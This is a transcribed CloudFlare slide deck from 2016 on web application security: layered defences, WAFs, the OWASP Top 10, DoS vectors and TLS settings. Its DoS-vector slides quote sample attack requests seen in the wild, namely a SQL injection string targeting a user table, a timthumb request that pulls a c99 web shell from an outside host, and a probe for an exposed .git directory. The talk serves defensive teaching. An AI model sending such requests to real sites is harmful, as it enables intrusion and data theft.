latest trends in web application security
TRANSCRIPT
Web Application Security
John Graham-Cumming |Chief Technology Officer, CloudFlare
March 2016
2
Agenda• Layered Web Application Security• 2015 Top Web Application Attack Techniques• Kitchen Sink Attacks• TLS
Introduction
4
Our mission
Help build a better Internet
5
Standards/PlatformAvailabilitySecurity Performance
Running applications on the Internet is challenging
“Hundreds of dollars a month for private hosting and it was still reliably crashing on or around decision day.”
“We're seeing some customers that are connecting to ixl.com via IPv6, which we are not equipped to handle.”
“The first flood of attack traffic was mitigated with some blocking techniques implemented by our CDN, but when the attack got more creative there was nothing more they could do.”
“Because our servers were only located in the U.S. at that time, some of our customers from other parts of the world were experiencing slower loading of the widget.”
6
We solve the challenges of the Internet
• Analytics• IPv6 gateway• DNSSEC• Google SPDY + HTTP2• Apps platform
Standards/Platform
• Load balancing• Always online• Redundant, Anycast
network
Availability
• Reputation-based security• Distributed denial of service
(DDoS) mitigation• Firewall• Secure socket layer (SSL)• Malware detection
Security
• Content delivery (CDN)• Authoritative DNS • Web content optimization
(WCO)• Front-end / mobile
optimization• Railgun™ WAN optimizer
Performance
7
Layered Web Application Security
9
What attackers attack• Web applications themselves
• e.g. attempted SQL injection
• e.g. DoS by hitting CPU expensive URI
• Web servers• Attempted access to files on machines
• SYN flooding to overwhelm TCP buffers
• Related infrastructure• Authoratitive DNS for a domain / DNS poisoning
• Domain registration
10
Layered Defense• Secure Coding Practices• Web Application Firewall
• Can protect against application level attacks
• Use one that can be customized for your application
• DoS mitigation service• DNS service that has withstood large DoS attacks• DNSSEC• A domain registrar with robust security policies to prevent transfer
11
Buying Time• A WAF buys time to patch vulnerabilities• Common to see vulnerabilities announced along with patches• But how long does it take to patch
12
Examples• December 14, 2015 CVE-2015-8562
• Joomla CMS Unserialize Vulnerability
• Released without a patch
• April 25, 2015 SUPEE-5344• Magento RCE Vulnerability
• April 15, 2015 CVE-2015-1635• Windows Server RCE Vulnerability
2015 Top Web Application Attack Techniques
14
OWASP Top 10 in 20151. A5 Security Misconfiguration2. A9 Using Components with
Known Vulnerabilities3. A6 Sensitive Data Exposure4. A4 Insecure Direct Object
References5. A1 Injection
6. A3 XSS7. A7 Missing Function Level
Access Control8. A8 Cross Site Request Forgery9. A10 Unvalidated Redirects and
Forwards10.A2 Weak authentication and
session management
15
Common Web DoS Vectors• Requests without a user agent
• Drop requests that have no User-Agent field
• WordPress pingback attacks• Drop WordPress pingbacks
• Fake user agent• Validate User-Agent to identify real browsers
16
Common Web DoS Vectors• Faulty data sanitization
/skin/interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20 count(*),concat((select%20concat(0x3a,md5(1122),\0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%232.
• Exploitation of timthumb for RCE
GET /wp-content/themes/thumb.php?src=http://dsf2kh34as.co/c99.php
17
Common Web DoS Vectors• Incorrect SCM data access
GET /.git/HEAD HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Kitchen Sink Attacks
19
Everything they’ve got• Common to see attackers try multiple vectors to bring down a web site
1. Simultaneous SYN flood, DNS reflection attack, and authoratitive DNS attack
2. Using multiple layer 7 (HTTP/HTTPS) botnets at the same time
3. 1 and 2
20
Typical DoS volume at CloudFlare
21
Recent 400 Gbps DoS attacks
TLS
23
24
DROWNMarch 1
2016
25
CloudFlare’s TLS Configuration• Public and on Github
https://github.com/cloudflare/sslconfig
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;ssl_ciphers EECDH+CHACHA20:EECDH+CHACHA20-draft:EECDH+AES128:RSA+AES128:EECDH+AES256:RSA+AES256:EECDH+3DES:RSA+3DES:!MD5;ssl_prefer_server_ciphers on;
Conclusion
27
Conclusion• Layered Defense• Patch but use a WAF to buy time• Stay on top of TLS